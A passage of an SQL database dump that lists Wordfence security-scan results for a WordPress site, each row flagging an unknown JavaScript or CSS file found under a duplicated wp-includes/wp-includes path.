href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/progressbar.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34315,1631564700,1631564700,'new','knownfile',75,'407b678326de712fa4b02f19383d29bf','8b1874ef91202ff2e9c90501517f3d35','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/progressbar.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/progressbar.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34316,1631564700,1631564700,'new','knownfile',75,'cb28ed4171910e910be5ad74b8bc8037','200658f5ca557769d64e940f305eaa24','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/resizable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/resizable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34317,1631564700,1631564700,'new','knownfile',75,'8d30499da6725868ec5df6949f7b8729','0bdfd894b657364ccf03481371ec1295','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/resizable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/resizable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34318,1631564700,1631564700,'new','knownfile',75,'48aab31ffb48f6c1667292071da00476','c4cd85a530f47dfddd8f1e69e4843a23','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/selectable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34319,1631564700,1631564700,'new','knownfile',75,'28a42e3b5f278c068c1927a22bd87b9d','7d1cc87262a4ef5b01b9e5b470873e4e','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/selectable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34320,1631564700,1631564700,'new','knownfile',75,'505e8f6c02bca1710801ad88a4f9cceb','1c397eb375d1cf44272d27ed1dab56a6','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectmenu.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/selectmenu.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34321,1631564700,1631564700,'new','knownfile',75,'c0f88752630287842cf2fee1857ba8f8','2356f1fa723c03999ec05b9a0808d6fe','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34322,1631564700,1631564700,'new','knownfile',75,'6205b855f24b42abb06e5fe546290654','9e1b8353982cedd2f89111f89d33c35f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/slider.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/slider.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34323,1631564700,1631564700,'new','knownfile',75,'78b58d5d273aba9d010168faf594eee9','084c8e49c86f28581c955cfb81945df4','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/slider.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/slider.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34324,1631564700,1631564700,'new','knownfile',75,'08687c95cd90dbc7092be84da526d700','88f3e12e0e3704e73eca326b346d41c8','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/sortable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/sortable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34325,1631564700,1631564700,'new','knownfile',75,'e80a35311e295fcbaad37c10484a4e46','0af01c6bcaaeb7666c71a8d06ff83483','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/sortable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/sortable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34326,1631564701,1631564701,'new','knownfile',75,'b9d798081425c03498eb7c46360d9275','22698cc531b1fb667c8525e7cb9150fa','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/spinner.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/jquery/ui/spinner.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34327,1631564701,1631564701,'new','knownfile',75,'f5f040bea0307feda7250c2bed096c79','54ae213bf1131214b4204c570c3496eb','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/spinner.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/spinner.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34328,1631564701,1631564701,'new','knownfile',75,'725c53b589a27db6b6ae9471866fd388','8135c650ecc17c3eb5fe9ee1e2b36d84','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tabs.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/ui/tabs.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34329,1631564701,1631564701,'new','knownfile',75,'af0fb60c362580d25bfd5972816bfa58','85b14e4757b78422d08063ee502581cd','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tabs.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/tabs.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34330,1631564701,1631564701,'new','knownfile',75,'c9a3ef6ff6604cdcc241c040b2a90f94','c80cc88dd738eab53897f0a9c2deeb81','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tooltip.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/jquery/ui/tooltip.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34331,1631564701,1631564701,'new','knownfile',75,'9ef6cbaf917a4a38742cce1bcf61cf6b','7dd5a460a7af799f7b193da7702d1962','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/tooltip.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/tooltip.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34332,1631564701,1631564701,'new','knownfile',75,'42efe3f9b29789eaa6da310f705fe62a','4d498491d8598d06ac8020c7475fadfc','Unknown file in WordPress core: wp-includes/wp-includes/js/json2.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/js/json2.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34333,1631564701,1631564701,'new','knownfile',75,'056fa86d583a8d41e20f54d1d9b95543','4e35bd04609c01e0ae64934111bd8cb0','Unknown file in WordPress core: wp-includes/wp-includes/js/json2.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/json2.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34334,1631564701,1631564701,'new','knownfile',75,'986c2780a21993a7edf61f050f6bfff1','d47eb171895f8b5332e930e944177a78','Unknown file in WordPress core: wp-includes/wp-includes/js/masonry.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/masonry.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34335,1631564701,1631564701,'new','knownfile',75,'f26b4f89130b2efc4f7d8525693713d7','1d6818c3cef3e440fa489028d2e49d83','Unknown file in WordPress core: wp-includes/wp-includes/js/mce-view.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/mce-view.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34336,1631564701,1631564701,'new','knownfile',75,'7247338de3f63b2b41b56894914659ea','06a0b72c65242503cc1c1e5e9adffb57','Unknown file in WordPress core: wp-includes/wp-includes/js/mce-view.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/mce-view.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34337,1631564701,1631564701,'new','knownfile',75,'67636eb2c44f019d7a44a9cd36051fc6','74394987136308a558fa341db3b84c07','Unknown file in WordPress core: wp-includes/wp-includes/js/media-audiovideo.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/media-audiovideo.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34338,1631564702,1631564702,'new','knownfile',75,'cb0c93023f447255c5b55a8b0ad0af1d','4f5bf5c9df6e6b01f54a396b9d68d068','Unknown file in WordPress core: wp-includes/wp-includes/js/media-audiovideo.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/media-audiovideo.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34339,1631564702,1631564702,'new','knownfile',75,'d2eae43143df05ae889b22e8927799cf','1f20ba3d1414b50eed9465afb3caa0f4','Unknown file in WordPress core: wp-includes/wp-includes/js/media-editor.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/media-editor.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34340,1631564702,1631564702,'new','knownfile',75,'fd1a119ca4a02bc0911f9e8ead142d40','37531bde7d1065bd91ea58c3a319184d','Unknown file in WordPress core: wp-includes/wp-includes/js/media-editor.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/media-editor.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34341,1631564702,1631564702,'new','knownfile',75,'b2cff32723099ccda1eeada609bae8de','23f9138fa826ce4c6ca63bb9d126fdb2','Unknown file in WordPress core: wp-includes/wp-includes/js/media-grid.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/media-grid.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34342,1631564702,1631564702,'new','knownfile',75,'bce07baae428ee52d6f329aa2cf28acd','675406f131ff47d6e55d51d40125a1cd','Unknown file in WordPress core: wp-includes/wp-includes/js/media-grid.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/media-grid.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34343,1631564702,1631564702,'new','knownfile',75,'e2f5479a1887995d3c6ad09a7db98b74','1bc2ccb153c594fe6280ddaeb977fa7a','Unknown file in WordPress core: wp-includes/wp-includes/js/media-models.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/media-models.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34344,1631564702,1631564702,'new','knownfile',75,'be3ae3cb8a3ace9d1e319f925d7971d8','30c780f683cf961d33bde412255c86f9','Unknown file in WordPress core: wp-includes/wp-includes/js/media-models.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/media-models.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34345,1631564702,1631564702,'new','knownfile',75,'54b1d58e44c165b727876cfd094829e1','c14bbe6e7cd4ceafd79e8f93c09c9f4d','Unknown file in WordPress core: wp-includes/wp-includes/js/media-views.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/media-views.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34346,1631564702,1631564702,'new','knownfile',75,'f3ed63cfac675e609fa09a82eef0faac','5a6f48c29dd1693233e79fcb7a810419','Unknown file in WordPress core: wp-includes/wp-includes/js/media-views.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/media-views.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34347,1631564702,1631564702,'new','knownfile',75,'e90f3a4755a7dbb9508879ee98d17584','5e98185b784f1df386fd37049dac6b5b','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34348,1631564702,1631564702,'new','knownfile',75,'9b93526f46643ffd053a8b3feb7dc7f6','31575184a43959adc21e576b733440cd','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34349,1631564702,1631564702,'new','knownfile',75,'5b42333a75cfd19e71766a64d9c3e3f9','6fd765d422ad77873161e2db1525aee6','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34350,1631564702,1631564702,'new','knownfile',75,'5a72f8e1014104227b8f2ebae3d8a0a4','a5d5f4c90a51a19083415404be3a0f09','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34351,1631564702,1631564702,'new','knownfile',75,'d0e23e4ed180138f9957872d42753445','2fe5f2f861770a9c11889c78fe4969d1','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/mediaelement/mediaelement.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34352,1631564702,1631564702,'new','knownfile',75,'a366363cecfc6df8fa6fb71395a79669','35e21a275d28760b988bd9b06bb6287d','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/mediaelement/mediaelement.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34353,1631564702,1631564702,'new','knownfile',75,'8dda0ab0db1e3771eadb5f1a937bd95d','035d6774ab81569269bf82a4ff8a5fab','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34354,1631564702,1631564702,'new','knownfile',75,'9d66fafab96483da117ee59317e803f8','e416d0d508ebb0485ead142e7f2b472e','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a 